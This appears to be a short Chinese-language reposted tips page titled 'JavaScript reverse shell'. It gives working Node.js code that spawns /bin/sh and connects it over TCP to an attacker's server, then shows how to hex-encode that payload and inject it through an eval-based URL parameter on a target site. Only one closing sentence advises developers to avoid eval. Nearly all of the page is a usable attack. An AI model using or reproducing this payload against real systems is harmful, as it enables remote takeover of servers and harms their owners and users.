JavaScript反向shell

標籤：soc   小技巧   java   技巧   require   執行   避免   highlight   name   

Node.js反向Shell

摘自：http://www.itfang.net/?p=109

如下的Javascript就是一個Node.js的反向串連shell。

這個payload將會產生一個/bin/sh的shell，建立一個TCP串連到攻擊者的伺服器，並且在通訊資料流中綁定shell命令。

(function(){    var net = require("net"),        cp = require("child_process"),        sh = cp.spawn("/bin/sh", []);    var client = new net.Socket();    client.connect(8080, "10.17.26.64", function(){        client.pipe(sh.stdin);        sh.stdout.pipe(client);        sh.stderr.pipe(client);    });    return /a/; // Prevents the Node.js application form crashing})();

為了優雅的執行payload，我們還需要一些小技巧，我們將反向串連shell的payload用16進位進行編碼，然後再用Node.js的Buffer對象來對其進行解碼操作。

http://target.tld/?name=["./;eval(new Buffer(‘PAYLOAD‘, ‘hex‘).toString());//*"]

我們強烈的建議開發人員們避免在JavaScript項目中使用eval函數，而修複的方法也很簡單，直接使用RegExp對象來對資料進行操作即可。

JavaScript反向shell